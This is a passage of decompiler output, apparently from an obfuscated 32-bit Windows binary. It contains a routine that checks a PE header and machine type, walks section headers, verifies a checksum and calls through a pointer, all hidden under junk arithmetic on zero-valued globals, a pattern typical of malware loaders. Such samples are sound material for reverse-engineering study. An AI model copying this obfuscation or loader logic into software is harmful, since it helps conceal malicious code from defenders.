						_t2962 =  *0x6da81260; // 0x0
						_t341 =  *0x6da81260; // 0x0
						_t2965 =  *0x6da81264; // 0x0
						_t344 =  *0x6da8126c; // 0x0
						_t1678 =  *0x6da81264; // 0x0
						_t346 =  *0x6da81260; // 0x0
						_t349 = E6DA2FAE0(_t2965 *  *0x6da8125c + _t1654 *  *0x6da8125c + _t315 *  *0x6da8125c + _a8 +  *0x6da81270 -  *0x6da81268 +  *0x6da81260 +  *0x6da81264 +  *0x6da81264 +  *0x6da8126c -  *0x6da81268 - _t2952 *  *0x6da81268 *  *0x6da81264 -  *0x6da81268 -  *0x6da81270 -  *0x6da81260 +  *0x6da81268 +  *0x6da81264 +  *0x6da81260 +  *0x6da81264 +  *0x6da8125c +  *0x6da81270 + _t1649 *  *0x6da81264 - _t2955 *  *0x6da81268 - _t1651 *  *0x6da8125c *  *0x6da81270 -  *0x6da81268 +  *0x6da81270 -  *0x6da81268 +  *0x6da81260 +  *0x6da81264 +  *0x6da81264 +  *0x6da8126c -  *0x6da81268 - _t2957 *  *0x6da81268 *  *0x6da81264 -  *0x6da81268 -  *0x6da81270 -  *0x6da81260 +  *0x6da81268 +  *0x6da81264 +  *0x6da81260 +  *0x6da81264 +  *0x6da8125c +  *0x6da81270 + _t2960 *  *0x6da81264 - _t339 *  *0x6da81268 - _t2962 *  *0x6da8125c *  *0x6da81270 -  *0x6da81268 +  *0x6da81270 -  *0x6da81268 +  *0x6da81260 +  *0x6da81264 +  *0x6da81264 +  *0x6da8126c -  *0x6da81268 - _t341 *  *0x6da81268 *  *0x6da81264 -  *0x6da81268 -  *0x6da81270 -  *0x6da81260 +  *0x6da81268 +  *0x6da81264 +  *0x6da81260 +  *0x6da81264 +  *0x6da8125c +  *0x6da81270 + _t344 *  *0x6da81264 - _t1678 *  *0x6da81268 - _t346 *  *0x6da8125c *  *0x6da81270 -  *0x6da81268, _t2938 *  *0x6da81268 *  *0x6da81260 *  *0x6da8125c + _t287 *  *0x6da81268 *  *0x6da81260 *  *0x6da8125c + _t1598 *  *0x6da81268 *  *0x6da81260 *  *0x6da8125c +  *_t8 + 0xf8 -  *0x6da81270 - _t1596 *  *0x6da8125c +  *0x6da81270 - _t2919 *  *0x6da8126c -  *0x6da81270 -  *0x6da81260 +  *0x6da81270 -  *0x6da81270 +  *0x6da81260 +  *0x6da81264 + _t2921 *  *0x6da8125c - _t279 *  *0x6da8126c *  *0x6da81270 + _t2923 *  *0x6da81260 - _t282 *  *0x6da8126c *  *0x6da81260 -  *0x6da81268 + _t2925 *  *0x6da81264 *  *0x6da8126c -  *0x6da81270 - _t285 *  *0x6da8125c +  *0x6da81270 - _t2928 *  *0x6da8126c -  *0x6da81270 -  *0x6da81260 +  *0x6da81270 -  *0x6da81270 +  *0x6da81260 +  *0x6da81264 + _t1619 *  *0x6da8125c - _t2930 *  *0x6da8126c *  *0x6da81270 + _t1621 *  *0x6da81260 - _t2933 *  *0x6da8126c *  *0x6da81260 -  *0x6da81268 + _t1623 *  *0x6da81264 *  *0x6da8126c -  *0x6da81270 - _t2936 *  *0x6da8125c +  *0x6da81270 - _t1626 *  *0x6da8126c -  *0x6da81270 -  *0x6da81260 +  *0x6da81270 -  *0x6da81270 +  *0x6da81260 +  *0x6da81264 + _t308 *  *0x6da8125c - _t1628 *  *0x6da8126c *  *0x6da81270 + _t310 *  *0x6da81260 - _t1631 *  *0x6da8126c *  *0x6da81260 -  *0x6da81268 + _t312 *  *0x6da81264 *  *0x6da8126c);
						_t4334 = _t4333 + 8;
						if(_t349 != 0) {
							_t11 = _v16 + 0x3c; // 0xa83d743d
							_t350 =  *0x6da81260; // 0x0
							_t1681 =  *0x6da81260; // 0x0
							_t2978 =  *0x6da81260; // 0x0
							_t354 =  *0x6da81260; // 0x0
							_v80 = _t354 *  *0x6da8126c + _t2978 *  *0x6da8125c + _t1681 *  *0x6da8126c + _t350 *  *0x6da8125c +  *_t11 +  *0x6da81268 +  *0x6da81268 +  *0x6da81268 +  *0x6da81268 +  *0x6da81268 +  *0x6da81268 + _a4;
							_t1686 =  *0x6da8126c; // 0x0
							_t2982 =  *0x6da81260; // 0x0
							_t15 = _t1686 *  *0x6da8125c +  *0x6da81268 + 0x4550; // 0x4550
							_t1689 =  *0x6da8126c; // 0x0
							_t2984 =  *0x6da8126c; // 0x0
							_t362 =  *0x6da81260; // 0x0
							_t1701 =  *0x6da8126c; // 0x0
							_t2986 =  *0x6da8126c; // 0x0
							_t368 =  *0x6da81260; // 0x0
							_t1713 =  *0x6da8126c; // 0x0
							if( *_v80 == _t1713 *  *0x6da81270 + _t368 *  *0x6da81260 + _t1701 *  *0x6da81270 + _t362 *  *0x6da81260 + _t1689 *  *0x6da81270 + _t2982 *  *0x6da81260 + _t15 +  *0x6da81264 +  *0x6da8126c +  *0x6da8126c +  *0x6da8126c -  *0x6da81268 -  *0x6da81260 +  *0x6da81264 -  *0x6da81268 +  *0x6da81264 +  *0x6da81260 + _t2984 *  *0x6da8125c +  *0x6da81268 +  *0x6da81264 +  *0x6da8126c +  *0x6da8126c +  *0x6da8126c -  *0x6da81268 -  *0x6da81260 +  *0x6da81264 -  *0x6da81268 +  *0x6da81264 +  *0x6da81260 + _t2986 *  *0x6da8125c +  *0x6da81268 +  *0x6da81264 +  *0x6da8126c +  *0x6da8126c +  *0x6da8126c -  *0x6da81268 -  *0x6da81260 +  *0x6da81264 -  *0x6da81268 +  *0x6da81264 +  *0x6da81260) {
								_t2989 =  *0x6da8126c; // 0x0
								_t375 =  *0x6da81260; // 0x0
								_t377 =  *0x6da81264; // 0x0
								_t379 =  *0x6da81270; // 0x0
								_t381 =  *0x6da81270; // 0x0
								_t383 =  *0x6da8126c; // 0x0
								_t385 =  *0x6da81260; // 0x0
								_t387 =  *0x6da81264; // 0x0
								_t389 =  *0x6da81270; // 0x0
								_t391 =  *0x6da81270; // 0x0
								_t393 =  *0x6da8126c; // 0x0
								_t395 =  *0x6da81260; // 0x0
								_t397 =  *0x6da81264; // 0x0
								_t399 =  *0x6da81270; // 0x0
								_t401 =  *0x6da81270; // 0x0
								if(( *(_v80 + 4) & 0x0000ffff) == _t2989 *  *0x6da8125c + 0x14c - _t375 *  *0x6da81260 -  *0x6da81270 -  *0x6da81270 +  *0x6da81264 + _t377 *  *0x6da81260 - _t379 *  *0x6da81264 +  *0x6da8125c -  *0x6da81270 +  *0x6da81260 +  *0x6da81264 -  *0x6da81260 -  *0x6da81270 + _t381 *  *0x6da8126c + _t383 *  *0x6da8125c - _t385 *  *0x6da81260 -  *0x6da81270 -  *0x6da81270 +  *0x6da81264 + _t387 *  *0x6da81260 - _t389 *  *0x6da81264 +  *0x6da8125c -  *0x6da81270 +  *0x6da81260 +  *0x6da81264 -  *0x6da81260 -  *0x6da81270 + _t391 *  *0x6da8126c + _t393 *  *0x6da8125c - _t395 *  *0x6da81260 -  *0x6da81270 -  *0x6da81270 +  *0x6da81264 + _t397 *  *0x6da81260 - _t399 *  *0x6da81264 +  *0x6da8125c -  *0x6da81270 +  *0x6da81260 +  *0x6da81264 -  *0x6da81260 -  *0x6da81270 + _t401 *  *0x6da8126c) {
									_t3033 =  *0x6da8126c; // 0x0
									_t403 =  *0x6da8126c; // 0x0
									_t3035 =  *0x6da8126c; // 0x0
									_t405 =  *0x6da8126c; // 0x0
									_t3037 =  *0x6da8126c; // 0x0
									_t407 =  *0x6da8126c; // 0x0
									if((0x00000001 -  *0x6da8126c + _t3033 *  *0x6da81260 -  *0x6da81270 -  *0x6da8126c +  *0x6da8125c +  *0x6da81268 -  *0x6da81270 -  *0x6da81260 + _t403 *  *0x6da81268 -  *0x6da81260 +  *0x6da8125c - _t3035 *  *0x6da8125c +  *0x6da81270 +  *0x6da8126c +  *0x6da81270 -  *0x6da81260 -  *0x6da81270 -  *0x6da8126c + _t405 *  *0x6da81260 -  *0x6da81270 -  *0x6da8126c +  *0x6da8125c +  *0x6da81268 -  *0x6da81270 -  *0x6da81260 + _t3037 *  *0x6da81268 -  *0x6da81260 +  *0x6da8125c - _t407 *  *0x6da8125c +  *0x6da81270 +  *0x6da8126c +  *0x6da81270 -  *0x6da81260 -  *0x6da81270 &  *(_v80 + 0x38)) == 0) {
										_t1761 =  *0x6da81270; // 0x0
										_t3041 =  *0x6da8126c; // 0x0
										_t1763 =  *0x6da81264; // 0x0
										_t3043 =  *0x6da8126c; // 0x0
										_t1765 =  *0x6da81264; // 0x0
										_t3045 =  *0x6da81270; // 0x0
										_t1767 =  *0x6da81270; // 0x0
										_t3049 =  *0x6da8126c; // 0x0
										_t1769 =  *0x6da81264; // 0x0
										_t3051 =  *0x6da8126c; // 0x0
										_t1771 =  *0x6da81264; // 0x0
										_t3053 =  *0x6da81270; // 0x0
										_v84 = _v80 + ( *(_v80 + 0x14) & 0x0000ffff) + 0x18 - _t1761 * 0x28 - _t3041 * 0x28 - _t1763 * 0x28 + _t3043 * 0x28 + _t1765 * 0x28 - _t3045 *  *0x6da81270 *  *0x6da81260 * 0x28 - _t1767 * 0x28 - _t3049 * 0x28 - _t1769 * 0x28 + _t3051 * 0x28 + _t1771 * 0x28 - _t3053 *  *0x6da81270 *  *0x6da81260 * 0x28;
										_v32 =  *(_v80 + 0x38);
										_v12 = 0;
										while(1) {
											_t424 =  *0x6da8126c; // 0x0
											_t1775 =  *0x6da8126c; // 0x0
											_t3060 =  *0x6da8126c; // 0x0
											_t434 =  *0x6da8126c; // 0x0
											if(_v12 >= _t3060 *  *0x6da8126c + _t424 *  *0x6da8126c + ( *(_v80 + 6) & 0x0000ffff) -  *0x6da8126c +  *0x6da8126c +  *0x6da8125c -  *0x6da81270 + _t1775 *  *0x6da81270 -  *0x6da81268 -  *0x6da81270 -  *0x6da8126c +  *0x6da8126c +  *0x6da8125c -  *0x6da81270 + _t434 *  *0x6da81270 -  *0x6da81268 -  *0x6da81270) {
												break;
											}
											if( *((intOrPtr*)(_v84 + 0x10)) != 0) {
												_t4271 =  *0x6da8125c; // 0x0
												_t2851 =  *0x6da81260; // 0x0
												_t4273 =  *0x6da81270; // 0x0
												_t2853 =  *0x6da81264; // 0x0
												_t4275 =  *0x6da8125c; // 0x0
												_t2855 =  *0x6da81260; // 0x0
												_t4277 =  *0x6da81270; // 0x0
												_t2857 =  *0x6da81264; // 0x0
												_v88 =  *((intOrPtr*)(_v84 + 0xc)) +  *((intOrPtr*)(_v84 + 0x10)) + _t4271 *  *0x6da81260 - _t2851 *  *0x6da81264 - _t4273 *  *0x6da81268 -  *0x6da81260 +  *0x6da81270 + _t2853 *  *0x6da8125c -  *0x6da8126c + _t4275 *  *0x6da81260 - _t2855 *  *0x6da81264 - _t4277 *  *0x6da81268 -  *0x6da81260 +  *0x6da81270 + _t2857 *  *0x6da8125c -  *0x6da8126c;
											} else {
												_t2897 =  *0x6da81268; // 0x0
												_t4324 =  *0x6da81268; // 0x0
												_t2899 =  *0x6da81268; // 0x0
												_t4326 =  *0x6da81268; // 0x0
												_t2901 =  *0x6da81268; // 0x0
												_t4328 =  *0x6da81268; // 0x0
												_t2903 =  *0x6da81268; // 0x0
												_v88 =  *((intOrPtr*)(_v84 + 0xc)) + _v32 -  *0x6da8126c - _t2897 *  *0x6da81264 -  *0x6da8126c - _t4324 *  *0x6da81264 -  *0x6da8126c - _t2899 *  *0x6da81264 -  *0x6da8126c - _t4326 *  *0x6da81264 -  *0x6da8126c - _t2901 *  *0x6da81264 -  *0x6da8126c - _t4328 *  *0x6da81264 -  *0x6da8126c - _t2903 *  *0x6da81264;
											}
											_t4279 =  *0x6da81270; // 0x0
											_t1503 =  *0x6da8126c; // 0x0
											_t2859 =  *0x6da8125c; // 0x0
											_t1510 =  *0x6da81270; // 0x0
											_t2861 =  *0x6da81270; // 0x0
											_t4299 =  *0x6da8126c; // 0x0
											_t1512 =  *0x6da8125c; // 0x0
											_t4306 =  *0x6da81270; // 0x0
											if(_v88 > _t2861 *  *0x6da81260 *  *0x6da8125c *  *0x6da81260 + _t4279 *  *0x6da81260 *  *0x6da8125c *  *0x6da81260 + _v20 +  *0x6da81260 + _t1503 *  *0x6da81270 *  *0x6da8126c *  *0x6da8126c *  *0x6da8125c *  *0x6da81264 *  *0x6da81264 + _t2859 *  *0x6da81260 -  *0x6da81268 +  *0x6da81260 +  *0x6da81268 +  *0x6da81270 +  *0x6da81268 -  *0x6da81260 +  *0x6da81264 +  *0x6da81270 - _t1510 *  *0x6da81270 -  *0x6da81270 -  *0x6da81268 +  *0x6da81260 + _t4299 *  *0x6da81270 *  *0x6da8126c *  *0x6da8126c *  *0x6da8125c *  *0x6da81264 *  *0x6da81264 + _t1512 *  *0x6da81260 -  *0x6da81268 +  *0x6da81260 +  *0x6da81268 +  *0x6da81270 +  *0x6da81268 -  *0x6da81260 +  *0x6da81264 +  *0x6da81270 - _t4306 *  *0x6da81270 -  *0x6da81270 -  *0x6da81268) {
												_t2879 =  *0x6da81270; // 0x0
												_t4310 =  *0x6da8125c; // 0x0
												_t2883 =  *0x6da81268; // 0x0
												_t4312 =  *0x6da81270; // 0x0
												_t2885 =  *0x6da8126c; // 0x0
												_t4314 =  *0x6da81270; // 0x0
												_t1526 =  *0x6da8125c; // 0x0
												_t4318 =  *0x6da81268; // 0x0
												_t1528 =  *0x6da81270; // 0x0
												_t4320 =  *0x6da8126c; // 0x0
												_v20 = _t4320 *  *0x6da8126c + _t2885 *  *0x6da8126c + _v88 -  *0x6da81260 -  *0x6da8126c +  *0x6da81260 - _t2879 *  *0x6da8126c *  *0x6da8126c *  *0x6da81264 + _t4310 *  *0x6da81260 - _t2883 *  *0x6da81260 - _t4312 *  *0x6da8126c -  *0x6da8126c +  *0x6da81268 -  *0x6da81260 -  *0x6da8126c +  *0x6da81260 - _t4314 *  *0x6da8126c *  *0x6da8126c *  *0x6da81264 + _t1526 *  *0x6da81260 - _t4318 *  *0x6da81260 - _t1528 *  *0x6da8126c -  *0x6da8126c +  *0x6da81268;
											}
											_v12 = _v12 + 1;
											_v84 = _v84 + 0x28;
										}
										_t436 =  *0x6da8126c; // 0x0
										_t3068 =  *0x6da81260; // 0x0
										_t439 =  *0x6da81260; // 0x0
										_t3070 =  *0x6da81264; // 0x0
										_t442 =  *0x6da8126c; // 0x0
										_t3073 =  *0x6da8126c; // 0x0
										_t445 =  *0x6da8126c; // 0x0
										_t3075 =  *0x6da8126c; // 0x0
										_t450 =  *0x6da81264; // 0x0
										_t3077 =  *0x6da81270; // 0x0
										_t452 =  *0x6da81268; // 0x0
										_t3079 =  *0x6da81268; // 0x0
										_t454 =  *0x6da8126c; // 0x0
										_t3084 =  *0x6da81260; // 0x0
										_t456 =  *0x6da8126c; // 0x0
										_t3086 =  *0x6da81270; // 0x0
										_t458 =  *0x6da81270; // 0x0
										_t3088 =  *0x6da81268; // 0x0
										_t460 =  *0x6da81260; // 0x0
										_t3090 =  *0x6da8126c; // 0x0
										_t462 =  *0x6da8126c; // 0x0
										_t3092 =  *0x6da81260; // 0x0
										_t465 =  *0x6da81260; // 0x0
										_t3094 =  *0x6da81264; // 0x0
										_t468 =  *0x6da8126c; // 0x0
										_t3097 =  *0x6da8126c; // 0x0
										_t471 =  *0x6da8126c; // 0x0
										_t3099 =  *0x6da8126c; // 0x0
										_t476 =  *0x6da81264; // 0x0
										_t3101 =  *0x6da81270; // 0x0
										_t478 =  *0x6da81268; // 0x0
										_t3103 =  *0x6da81268; // 0x0
										_t480 =  *0x6da8126c; // 0x0
										_t3108 =  *0x6da81260; // 0x0
										_t482 =  *0x6da8126c; // 0x0
										_t3110 =  *0x6da81270; // 0x0
										_t484 =  *0x6da81270; // 0x0
										_t3112 =  *0x6da81268; // 0x0
										_t486 =  *0x6da81260; // 0x0
										_t3114 =  *0x6da8126c; // 0x0
										_t488 =  *0x6da8126c; // 0x0
										_t3116 =  *0x6da81260; // 0x0
										_t491 =  *0x6da81260; // 0x0
										_t3118 =  *0x6da81264; // 0x0
										_t494 =  *0x6da8126c; // 0x0
										_t3121 =  *0x6da8126c; // 0x0
										_t497 =  *0x6da8126c; // 0x0
										_t3123 =  *0x6da8126c; // 0x0
										_t502 =  *0x6da81264; // 0x0
										_t3125 =  *0x6da81270; // 0x0
										_t504 =  *0x6da81268; // 0x0
										_t3127 =  *0x6da81268; // 0x0
										_t506 =  *0x6da8126c; // 0x0
										_t3132 =  *0x6da81260; // 0x0
										_t508 =  *0x6da8126c; // 0x0
										_t3134 =  *0x6da81270; // 0x0
										_t510 =  *0x6da81270; // 0x0
										_t3136 =  *0x6da81268; // 0x0
										_t512 =  *0x6da81260; // 0x0
										_t3138 =  *0x6da8126c; // 0x0
										_t514 =  *0x6da8126c; // 0x0
										_t3140 =  *0x6da81260; // 0x0
										_t517 =  *0x6da81260; // 0x0
										_t3142 =  *0x6da81264; // 0x0
										_t520 =  *0x6da8126c; // 0x0
										_t3145 =  *0x6da8126c; // 0x0
										_t523 =  *0x6da8126c; // 0x0
										_t3147 =  *0x6da8126c; // 0x0
										_t528 =  *0x6da81264; // 0x0
										_t3149 =  *0x6da81270; // 0x0
										_t530 =  *0x6da81268; // 0x0
										_t3151 =  *0x6da81268; // 0x0
										_t532 =  *0x6da8126c; // 0x0
										_t3156 =  *0x6da81260; // 0x0
										_t534 =  *0x6da8126c; // 0x0
										_t3158 =  *0x6da81270; // 0x0
										_t536 =  *0x6da81270; // 0x0
										_t3160 =  *0x6da81268; // 0x0
										_t538 =  *0x6da81260; // 0x0
										_t3162 =  *0x6da8126c; // 0x0
										 *0x6da83d28(_t4331 + _t436 *  *0x6da81264 * 0x24 - 0x40 - _t3068 * 0x24 - _t439 *  *0x6da8126c * 0x24 + _t3070 *  *0x6da8126c * 0x24 + _t442 *  *0x6da8125c * 0x24 + _t3073 * 0x24 + _t445 *  *0x6da81260 *  *0x6da8126c *  *0x6da81260 * 0x24 - _t3075 * 0x24 - _t450 * 0x24 - _t3077 * 0x24 - _t452 * 0x24 - _t3079 *  *0x6da8126c *  *0x6da8126c *  *0x6da81260 * 0x24 - _t454 * 0x24 + _t3084 * 0x24 - _t456 * 0x24 - _t3086 * 0x24 - _t458 * 0x24 - _t3088 * 0x24 + _t460 * 0x24 + _t3090 * 0x24 + _t462 *  *0x6da81264 * 0x24 - _t3092 * 0x24 - _t465 *  *0x6da8126c * 0x24 + _t3094 *  *0x6da8126c * 0x24 + _t468 *  *0x6da8125c * 0x24 + _t3097 * 0x24 + _t471 *  *0x6da81260 *  *0x6da8126c *  *0x6da81260 * 0x24 - _t3099 * 0x24 - _t476 * 0x24 - _t3101 * 0x24 - _t478 * 0x24 - _t3103 *  *0x6da8126c *  *0x6da8126c *  *0x6da81260 * 0x24 - _t480 * 0x24 + _t3108 * 0x24 - _t482 * 0x24 - _t3110 * 0x24 - _t484 * 0x24 - _t3112 * 0x24 + _t486 * 0x24 + _t3114 * 0x24 + _t488 *  *0x6da81264 * 0x24 - _t3116 * 0x24 - _t491 *  *0x6da8126c * 0x24 + _t3118 *  *0x6da8126c * 0x24 + _t494 *  *0x6da8125c * 0x24 + _t3121 * 0x24 + _t497 *  *0x6da81260 *  *0x6da8126c *  *0x6da81260 * 0x24 - _t3123 * 0x24 - _t502 * 0x24 - _t3125 * 0x24 - _t504 * 0x24 - _t3127 *  *0x6da8126c *  *0x6da8126c *  *0x6da81260 * 0x24 - _t506 * 0x24 + _t3132 * 0x24 - _t508 * 0x24 - _t3134 * 0x24 - _t510 * 0x24 - _t3136 * 0x24 + _t512 * 0x24 + _t3138 * 0x24 + _t514 *  *0x6da81264 * 0x24 - _t3140 * 0x24 - _t517 *  *0x6da8126c * 0x24 + _t3142 *  *0x6da8126c * 0x24 + _t520 *  *0x6da8125c * 0x24 + _t3145 * 0x24 + _t523 *  *0x6da81260 *  *0x6da8126c *  *0x6da81260 * 0x24 - _t3147 * 0x24 - _t528 * 0x24 - _t3149 * 0x24 - _t530 * 0x24 - _t3151 *  *0x6da8126c *  *0x6da8126c *  *0x6da81260 * 0x24 - _t532 * 0x24 + _t3156 * 0x24 - _t534 * 0x24 - _t3158 * 0x24 - _t536 * 0x24 - _t3160 * 0x24 + _t538 * 0x24 + _t3162 * 0x24);
										_t541 =  *0x6da8126c; // 0x0
										_t3164 =  *0x6da81268; // 0x0
										_t543 =  *0x6da8126c; // 0x0
										_t3166 =  *0x6da81260; // 0x0
										_t545 =  *0x6da81264; // 0x0
										_t3168 =  *0x6da8126c; // 0x0
										_t548 =  *0x6da81268; // 0x0
										_t3170 =  *0x6da8126c; // 0x0
										_t550 =  *0x6da81260; // 0x0
										_t3172 =  *0x6da81264; // 0x0
										_t552 =  *0x6da8126c; // 0x0
										_t3175 =  *0x6da81268; // 0x0
										_t554 =  *0x6da8126c; // 0x0
										_t3177 =  *0x6da81260; // 0x0
										_t556 =  *0x6da81264; // 0x0
										_t3179 =  *0x6da8126c; // 0x0
										_t559 =  *0x6da81268; // 0x0
										_t3181 =  *0x6da8126c; // 0x0
										_t561 =  *0x6da81260; // 0x0
										_t3183 =  *0x6da81264; // 0x0
										_t563 =  *0x6da81260; // 0x0
										_t565 =  *0x6da81260; // 0x0
										_t1919 =  *0x6da81260; // 0x0
										_t3195 =  *0x6da81260; // 0x0
										_t567 =  *0x6da81260; // 0x0
										_t1928 =  *0x6da81260; // 0x0
										_t3197 =  *0x6da81260; // 0x0
										_t576 =  *0x6da81260; // 0x0
										_t1930 =  *0x6da81260; // 0x0
										_t3206 =  *0x6da81260; // 0x0
										_t578 =  *0x6da81260; // 0x0
										_t1939 =  *0x6da81260; // 0x0
										_t586 = E6DA2FA90(_t578 *  *0x6da8126c + _t1930 *  *0x6da8126c + _t3197 *  *0x6da8126c + _t567 *  *0x6da8126c + _t1919 *  *0x6da8126c +  *((intOrPtr*)(_v80 + 0x50)) + _t563 *  *0x6da8126c +  *0x6da81264 -  *0x6da81270 +  *0x6da8126c +  *0x6da81270 +  *0x6da81264 - _t565 *  *0x6da8125c +  *0x6da81264 -  *0x6da81270 +  *0x6da8126c +  *0x6da81270 +  *0x6da81264 - _t3195 *  *0x6da8125c +  *0x6da81264 -  *0x6da81270 +  *0x6da8126c +  *0x6da81270 +  *0x6da81264 - _t1928 *  *0x6da8125c +  *0x6da81264 -  *0x6da81270 +  *0x6da8126c +  *0x6da81270 +  *0x6da81264 - _t576 *  *0x6da8125c +  *0x6da81264 -  *0x6da81270 +  *0x6da8126c +  *0x6da81270 +  *0x6da81264 - _t3206 *  *0x6da8125c +  *0x6da81264 -  *0x6da81270 +  *0x6da8126c +  *0x6da81270 +  *0x6da81264 - _t1939 *  *0x6da8125c, _v64 - _t541 *  *0x6da8126c -  *0x6da8126c -  *0x6da8126c -  *0x6da8126c -  *0x6da8126c -  *0x6da8126c - _t3164 *  *0x6da81260 -  *0x6da81270 -  *0x6da81270 -  *0x6da81270 - _t543 *  *0x6da81260 +  *0x6da8126c -  *0x6da81270 + _t3166 *  *0x6da81260 + _t545 *  *0x6da81260 *  *0x6da81260 - _t3168 *  *0x6da8126c -  *0x6da8126c -  *0x6da8126c -  *0x6da8126c -  *0x6da8126c -  *0x6da8126c - _t548 *  *0x6da81260 -  *0x6da81270 -  *0x6da81270 -  *0x6da81270 - _t3170 *  *0x6da81260 +  *0x6da8126c -  *0x6da81270 + _t550 *  *0x6da81260 + _t3172 *  *0x6da81260 *  *0x6da81260 - _t552 *  *0x6da8126c -  *0x6da8126c -  *0x6da8126c -  *0x6da8126c -  *0x6da8126c -  *0x6da8126c - _t3175 *  *0x6da81260 -  *0x6da81270 -  *0x6da81270 -  *0x6da81270 - _t554 *  *0x6da81260 +  *0x6da8126c -  *0x6da81270 + _t3177 *  *0x6da81260 + _t556 *  *0x6da81260 *  *0x6da81260 - _t3179 *  *0x6da8126c -  *0x6da8126c -  *0x6da8126c -  *0x6da8126c -  *0x6da8126c -  *0x6da8126c - _t559 *  *0x6da81260 -  *0x6da81270 -  *0x6da81270 -  *0x6da81270 - _t3181 *  *0x6da81260 +  *0x6da8126c -  *0x6da81270 + _t561 *  *0x6da81260 + _t3183 *  *0x6da81260 *  *0x6da81260);
										_t3208 =  *0x6da81268; // 0x0
										_t1941 =  *0x6da81270; // 0x0
										_t3210 =  *0x6da81264; // 0x0
										_t1943 =  *0x6da8126c; // 0x0
										_t3212 =  *0x6da81264; // 0x0
										_t1946 =  *0x6da81270; // 0x0
										_t3214 =  *0x6da81268; // 0x0
										_t1949 =  *0x6da81268; // 0x0
										_t3216 =  *0x6da81270; // 0x0
										_t1951 =  *0x6da81264; // 0x0
										_t3218 =  *0x6da8126c; // 0x0
										_t1953 =  *0x6da81264; // 0x0
										_t3221 =  *0x6da81270; // 0x0
										_t1955 =  *0x6da81268; // 0x0
										_v28 = _t586 +  *0x6da81260 +  *0x6da81270 - _t3208 *  *0x6da81264 -  *0x6da8126c +  *0x6da81270 - _t1941 *  *0x6da81264 + _t3210 *  *0x6da81264 - _t1943 *  *0x6da81268 *  *0x6da81264 +  *0x6da8125c +  *0x6da81268 +  *0x6da81264 -  *0x6da81268 -  *0x6da81260 +  *0x6da81264 - _t3212 *  *0x6da81260 - _t1946 *  *0x6da8126c *  *0x6da81270 - _t3214 *  *0x6da8125c +  *0x6da81260 +  *0x6da81270 - _t1949 *  *0x6da81264 -  *0x6da8126c +  *0x6da81270 - _t3216 *  *0x6da81264 + _t1951 *  *0x6da81264 - _t3218 *  *0x6da81268 *  *0x6da81264 +  *0x6da8125c +  *0x6da81268 +  *0x6da81264 -  *0x6da81268 -  *0x6da81260 +  *0x6da81264 - _t1953 *  *0x6da81260 - _t3221 *  *0x6da8126c *  *0x6da81270 - _t1955 *  *0x6da8125c;
										_t621 =  *0x6da81260; // 0x0
										_t1957 =  *0x6da81260; // 0x0
										_t623 =  *0x6da81260; // 0x0
										_t1959 =  *0x6da81260; // 0x0
										_t625 =  *0x6da8126c; // 0x0
										_t1961 =  *0x6da81268; // 0x0
										_t627 =  *0x6da81270; // 0x0
										_t1963 =  *0x6da81260; // 0x0
										_t630 =  *0x6da81270; // 0x0
										_t633 = E6DA2FA90(_t630 *  *0x6da81260 + _v20 -  *0x6da81268 +  *0x6da8126c +  *0x6da81268 +  *0x6da81260 -  *0x6da81268 -  *0x6da81264 +  *0x6da81260 -  *0x6da81264 - _t625 *  *0x6da8126c -  *0x6da81268 - _t1961 *  *0x6da81260 +  *0x6da8125c - _t627 *  *0x6da81270 *  *0x6da8125c -  *0x6da81260 -  *0x6da81260 +  *0x6da81268 - _t1963 *  *0x6da8126c -  *0x6da81260 -  *0x6da8126c +  *0x6da81260, _v64 -  *0x6da8125c +  *0x6da81264 + _t621 *  *0x6da8125c -  *0x6da8125c +  *0x6da81264 + _t1957 *  *0x6da8125c -  *0x6da8125c +  *0x6da81264 + _t623 *  *0x6da8125c -  *0x6da8125c +  *0x6da81264 + _t1959 *  *0x6da8125c);
										_t4336 = _t4334 + 0x10;
										if(_v28 == _t633) {
											_t3258 =  *0x6da8125c; // 0x0
											_t634 =  *0x6da81268; // 0x0
											_t64 = _t3258 + 4; // 0x4
											_t3259 =  *0x6da81260; // 0x0
											_t635 =  *0x6da81260; // 0x0
											_t1975 =  *0x6da81260; // 0x0
											_t3261 =  *0x6da81260; // 0x0
											_t637 =  *0x6da81264; // 0x0
											_t3264 =  *0x6da8126c; // 0x0
											_t639 =  *0x6da8125c; // 0x0
											_t3268 =  *0x6da81260; // 0x0
											_t641 =  *0x6da81264; // 0x0
											_t3271 =  *0x6da8126c; // 0x0
											_t643 =  *0x6da8125c; // 0x0
											_t3275 =  *0x6da81260; // 0x0
											_t645 =  *0x6da81264; // 0x0
											_t3278 =  *0x6da8126c; // 0x0
											_t647 =  *0x6da8125c; // 0x0
											_t3282 =  *0x6da81260; // 0x0
											_t649 =  *0x6da81264; // 0x0
											_t3285 =  *0x6da8126c; // 0x0
											_t651 =  *0x6da8125c; // 0x0
											_t3289 =  *0x6da81260; // 0x0
											_t653 =  *0x6da81264; // 0x0
											_t3292 =  *0x6da8126c; // 0x0
											_t655 =  *0x6da8125c; // 0x0
											_t657 =  *0x6da81260; // 0x0
											_t659 =  *0x6da81260; // 0x0
											_t661 =  *0x6da81260; // 0x0
											_t663 =  *0x6da81260; // 0x0
											_t665 =  *0x6da81260; // 0x0
											_t667 =  *0x6da81260; // 0x0
											_t669 =  *0x6da81260; // 0x0
											_t671 =  *0x6da81260; // 0x0
											_t673 =  *0x6da81260; // 0x0
											_t675 =  *0x6da81260; // 0x0
											_t677 =  *0x6da81260; // 0x0
											_t679 =  *0x6da81260; // 0x0
											_t2053 =  *0x6da8126c; // 0x0
											_t3412 =  *0x6da8126c; // 0x0
											_t685 =  *0x6da81264; // 0x0
											_t2055 =  *0x6da8126c; // 0x0
											_t687 =  *0x6da81264; // 0x0
											_t2058 =  *0x6da81270; // 0x0
											_t689 =  *0x6da8126c; // 0x0
											_t2060 =  *0x6da8126c; // 0x0
											_t3428 =  *0x6da81264; // 0x0
											_t691 =  *0x6da8126c; // 0x0
											_t3430 =  *0x6da81264; // 0x0
											_t694 =  *0x6da81270; // 0x0
